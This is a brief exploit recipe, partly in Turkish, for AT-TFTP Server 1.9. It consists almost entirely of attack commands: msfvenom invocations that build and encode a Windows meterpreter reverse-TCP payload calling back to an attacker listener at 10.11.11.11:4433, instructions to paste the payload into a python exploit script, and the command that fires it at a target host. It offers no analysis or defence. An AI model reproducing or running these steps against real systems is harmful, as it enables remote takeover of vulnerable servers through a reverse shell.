at-tftp server 1.9

Exploit : AT-TFTP Server 1.9

Python Exploit File

# printf '\x81\xec\xac\x0d\x00\x00' > payload
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.11.11 LPORT=4433 -a x86 --platform Windows -e generic/none -f raw >> payload

Aşağıdaki komut ile beraber çıkan çıktıyı python dosyasında yer alan payload değişkenine set et.
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c -e x86/shikata_ga_nai -a x86 --platform Windows


Daha sonra multi/handler üzerinden port dinleme moduna alınır ve aşağıdaki komut ile python dosyası çalıştırılır.
# python telesynftp.py 10.11.11.13 69 10.11.11.11 10

Last updated